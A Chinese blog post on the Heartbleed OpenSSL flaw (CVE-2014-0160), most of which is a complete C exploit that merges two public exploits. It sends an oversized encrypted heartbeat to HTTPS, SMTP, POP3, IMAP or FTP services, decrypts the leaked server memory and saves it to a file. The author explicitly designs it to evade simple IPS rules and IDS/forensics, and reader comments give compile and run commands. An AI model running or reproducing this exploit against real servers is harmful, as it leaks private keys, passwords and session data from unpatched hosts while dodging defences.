OpenSSL的heartbeat漏洞(CVE-2014-0160)

这几天openssl的信息泄露漏洞闹得满城风雨,漏洞的原因http://drops.wooyun.org/papers/1381分析得很清楚了。第一个版本的EXP是针对HTTPS的,我提出作简单的IPS规则过滤。匹配tcp协议payload长度为8字节并且前6个字节等于\0x18\0x03\0x02\0x00\0x03\0x01的数据包,做丢弃处理。

结果今天有老外放出一个新的EXP,https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c。它不是在TCP层去发送心跳请求,而是改成了在TLS层去做。这样,心跳请求就是加密的了,长度不固定,而且固定的字节进一步缩短,IPS规则再缩短的话就有大量误报了,估计厂商只能精确识别,简单的规则行不通了。

另外的,由于是OpenSSL的漏洞,影响面不仅仅是HTTPS,其它的应用也在范围之内,因此有了这个EXP,https://github.com/decal/ssltest-stls/blob/master/ssltest-stls.py,它可以DUMP非HTTPS的数据,如SMTPS的。

BTW,465、993、995这种端口,默认就是SSL的,不需要STARTTLS之类的指令,监听25端口的SMTP默认明文,但是有的可以用STARTTLS要求开启加密隧道。

有鉴于此,我把这两个EXP整合了一下,即可以躲避简单的IPS,也可以搞SMTPS之类的服务。IMAPS的没测试,没找到合适的目标机器。

/* 
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* wrote to a file to annoy IDS/forensics. 
* 
* https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c
* https://raw.githubusercontent.com/decal/ssltest-stls/master/ssltest-stls.py
* 
* yunshu@outlook.com
*
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <signal.h>
#include <netdb.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <inttypes.h>
#include <openssl/bio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <openssl/evp.h>
#include <openssl/tls1.h>
#include <openssl/rand.h>
#include <openssl/buffer.h>

#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
		(((unsigned int)(c[1]))    )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
		 c[1]=(unsigned char)(((s)    )&0xff)),c+=2)

typedef struct {
	int socket;
	SSL *sslHandle;
	SSL_CTX *sslContext;
} connection;

typedef struct {
  unsigned char type;
  short version;
  unsigned int length;
  unsigned char hbtype;
  unsigned int payload_length;
  void* payload;
} heartbeat;

int tcp_connect(char* server,int port){
	int sd,ret;
	struct hostent *host;
        struct sockaddr_in sa;
        host = gethostbyname(server);
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd==-1){
		printf("[!] cannot create socket\n");
		exit(0);
	}
	sa.sin_family = AF_INET;
        sa.sin_port = htons(port);
        sa.sin_addr = *((struct in_addr *) host->h_addr);
        bzero(&(sa.sin_zero),8);
	printf("[ connecting to %s %d/tcp\n",server,port);
        ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
	if(ret==0){
		printf("[ connected to %s %d/tcp\n",server,port);
	}
	else{
		printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
		exit(0);
	}
	return sd;
}

void ssl_init(){
        SSL_load_error_strings();
        SSL_library_init();
        OpenSSL_add_all_digests();
        OpenSSL_add_all_algorithms();
        OpenSSL_add_all_ciphers();
}

connection* tls_connect(int sd){
        connection *c;
	c = malloc(sizeof(connection));
        c->socket = sd;
        c->sslHandle = NULL;
        c->sslContext = NULL;
        c->sslContext = SSL_CTX_new(TLSv1_client_method());
        if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
        c->sslHandle = SSL_new(c->sslContext);
        if(c->sslHandle==NULL)
                ERR_print_errors_fp(stderr);
        if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
        if(SSL_connect(c->sslHandle)!=1)
                ERR_print_errors_fp(stderr);
        if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
        }
	return c;
}

int pre_cmd(int sd, int type){
	char buff[1024] = { 0 };

	// smtp
	if(type==1){
		char *cmd1 = "EHLO openssl.client.net\r\n";
		char *cmd2 = "STARTTLS\r\n";

		sd = get_banner( sd );
		sd = send_cmd( sd, cmd1 );
		sd = send_cmd( sd, cmd2 );
	}
	else if(type==2){
		char *cmd = "STLS\r\n";
		
		sd = get_banner( sd );
		sd = send_cmd(sd, cmd);
	}
	else if(type==3){
		char *cmd = "STARTTLS\r\n";
		sd = get_banner( sd );
		sd = send_cmd(sd, cmd);
	}
	else if(type==4){
		char *cmd = "AUTH TLS\r\n";
		sd = get_banner( sd );
		sd = send_cmd(sd, cmd);
	}
	return sd;
}

int get_banner( int sd )
{
	char buff[10240] = { 0 };
	
	memset( (void*)buff, 0, sizeof(buff) );
	recv(sd, buff, sizeof(buff)-1, 0 );
	printf( "[ recv: %s\n", buff );

	return sd;
}
	
int send_cmd( int sd, char *cmd )
{
	char buff[10240] = { 0 };

	send(sd, (void *)cmd, strlen(cmd), 0 );
	printf( "[ send: %s\n", cmd );
	memset( (void*)buff, 0, sizeof(buff) );
	recv(sd, buff, sizeof(buff)-1, 0 );
	printf( "[ recv: %s\n", buff );

	return sd;
}
	
void* heartbleed(connection *c){
	unsigned char *buf, *p;
        int ret;
	buf = OPENSSL_malloc(1 + 2);
        p = buf;
        *p++ = TLS1_HB_REQUEST;
	
	s2n(0xffff,p);
	printf("[ setting heartbeat payload_length to 65535 bytes\n");
	
	printf("[ <3 <3 <3 heart bleed <3 <3 <3 <3\n");
        ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
        OPENSSL_free(buf);
	printf( "[ exp send finished.\n" );
	return c;
}

void* sneakyleaky(connection *c,char* filename, int verbose){
	char *p;
        int ssl_major,ssl_minor,al;
        int enc_err,n,i;
        SSL3_RECORD *rr;
        SSL_SESSION *sess;
	SSL* s;
        unsigned char md[EVP_MAX_MD_SIZE];
        short version;
        unsigned mac_size, orig_len;
        size_t extra;
        rr= &(c->sslHandle->s3->rrec);
        sess=c->sslHandle->session;
        s = c->sslHandle;
        if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)
                extra=SSL3_RT_MAX_EXTRA;
        else
                extra=0;
        if ((s->rstate != SSL_ST_READ_BODY) ||
                (s->packet_length < SSL3_RT_HEADER_LENGTH)) {
                        n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
                        if (n <= 0)
                                goto apple; 
                        s->rstate=SSL_ST_READ_BODY;
                        p=s->packet;
                        rr->type= *(p++);
                        ssl_major= *(p++);
                        ssl_minor= *(p++);
                        version=(ssl_major<<8)|ssl_minor;
                        n2s(p,rr->length);
			if(rr->type==24){
				printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
			}
			else{
				printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
				s->packet_length=0;
				goto apple;
			}
        }
        if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){
                i=rr->length;
                n=ssl3_read_n(s,i,i,1);
                if (n <= 0) goto apple; 
        }
	printf("[ decrypting and decompressing SSL packet\n");
        s->rstate=SSL_ST_READ_HEADER; 
        rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
        rr->data=rr->input;
        tls1_enc(s,0);
        if(verbose==1){
                { unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
                printf("\n");
        }
        if((sess != NULL) &&
            (s->enc_read_ctx != NULL) &&
            (EVP_MD_CTX_md(s->read_hash) != NULL))
                {
                unsigned char *mac = NULL;
                unsigned char mac_tmp[EVP_MAX_MD_SIZE];
                mac_size=EVP_MD_CTX_size(s->read_hash);
                OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
                orig_len = rr->length+((unsigned int)rr->type>>8);
                if(orig_len < mac_size ||
                  (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
                   orig_len < mac_size+1)){
                        al=SSL_AD_DECODE_ERROR;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
                }
                if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
                        mac = mac_tmp;
                        ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
                        rr->length -= mac_size;
                }
                else{
                        rr->length -= mac_size;
                        mac = &rr->data[rr->length];
                }
                i = tls1_mac(s,md,0);
                if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
                        enc_err = -1;
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)
                        enc_err = -1;
                }
        if(enc_err < 0){
                al=SSL_AD_BAD_RECORD_MAC;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
                goto apple;
        }
        if(s->expand != NULL){
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {
                        al=SSL_AD_RECORD_OVERFLOW;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
                        goto apple;
                        }
                if (!ssl3_do_uncompress(s)) {
                        al=SSL_AD_DECOMPRESSION_FAILURE;
                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
                        goto apple;
                        }
                }
        if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {
                al=SSL_AD_RECORD_OVERFLOW;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
                goto apple;
        }
        rr->off=0;
        s->packet_length=0;
	printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
	int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
        write(fd,s->s3->rrec.data,s->s3->rrec.length);
        close(fd);
	printf("[ wrote %d bytes to file '%s'\n",rr->length, filename);
	printf("[ done.\n");
	exit(0);
apple:
        printf("[ problem handling SSL record packet - wrong type?\n");
}

void usage(){
	printf("[\n");
	printf("[ --server|-s <ip/dns>    - the server to target\n");
	printf("[ --port|-p   <port>      - the port to target\n");
	printf("[ --file|-f   <filename>  - file to write data to\n");
	printf("[ --type|-t               - select service type to try\n");
	printf("[                           0 = default using ssl tunnel, don't need STARTTLS, just like 443(https),465(smtps),995(pop3s),993(imaps)\n");
	printf("[			    1 = smtp, 25\n");
	printf("[			    2 = pop3, 110\n");
	printf("[			    3 = imap, 389\n");
	printf("[			    4 = ftp, 21\n");
	printf("[\n");
	printf("[ --verbose|-v            - output leak to screen\n");
	printf("[ --help|-h               - this output\n");
	printf("[\n");
	exit(0);
}

int main(int argc, char* argv[]){
	int ret, port, userc, index;
	int type = 1, udp = 0, verbose = 0, bind = 0;
	struct hostent *h;
	connection* c;
	char *host, *file;
	int ihost = 0, iport = 0, ifile = 0, itype = 0;
	printf("\n\n");
	printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
	printf("[ =============================================================\n");
        static struct option options[] = {
        	{"server", 1, 0, 's'},
	        {"port", 1, 0, 'p'},
		{"file", 1, 0, 'f'},
		{"type", 1, 0, 't'},
		{"verbose", 0, 0, 'v'},
		{"help", 0, 0,'h'}
        };
	while(userc != -1) {
	        userc = getopt_long(argc,argv,"s:p:f:t:vh",options,&index);	
        	switch(userc) {
               		case -1:
	                        break;
        	        case 's':
				if(ihost==0){
					ihost = 1;
					h = gethostbyname(optarg);				
					if(h==NULL){
						printf("[!] FATAL: unknown host '%s'\n",optarg);
						exit(1);
					}
					host = malloc(strlen(optarg) + 1);
					sprintf(host,"%s",optarg);
               			}
				break;
	                case 'p':
				if(iport==0){
					port = atoi(optarg);
					iport = 1;
				}
                	        break;
			case 'f':
				if(ifile==0){
					file = malloc(strlen(optarg) + 1);
					sprintf(file,"%s",optarg);
					ifile = 1;
				}
				break;
			case 't':
				if(itype==0){
					type = atoi(optarg);
					itype = 1;
				}
				break;
			case 'h':
				usage();
				break;
			case 'b':
				if(ihost==0){
					ihost = 1;
					host = malloc(strlen(optarg)+1);
					sprintf(host,"%s",optarg);
					bind = 1;
				}
				break;
			case 'v':
				verbose = 1;
				break;
			default:
				break;
		}
	}
	if(ihost==0||iport==0||ifile==0||itype==0){
		printf("[ try --help\n");
		exit(0);
	}
	ssl_init();
	
	ret = tcp_connect(host, port);

	if(type!=0){
		pre_cmd(ret, type);
	}

	c = tls_connect(ret);
	heartbleed(c);
	sneakyleaky(c,file,verbose);

	printf("\n\n");
	exit(0);
}
此条目发表在技术分类目录。将固定链接加入收藏夹。

OpenSSL的heartbeat漏洞(CVE-2014-0160)》有 6 条评论

  1. 兔子说:

    这个好淫荡。。 很和谐啊。。。

  2. 兔子说:

    我这边编译 报错。。。

    /tmp/cco7IJAN.o: In function `ssl_init’:
    ssl.c:(.text+0x113): undefined reference to `SSL_load_error_strings’
    ssl.c:(.text+0x118): undefined reference to `SSL_library_init’

    汗。。。

  3. 兔子说:

    是我 比较搓了。。

    * Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
    *
    * E.g.
    * $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
    * $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1

    按照这个 可以编译。。。汗

  4. itebooks说:

    为什么最终的数据不是64K?

发表评论

电子邮件地址不会被公开。 必填项已用*标注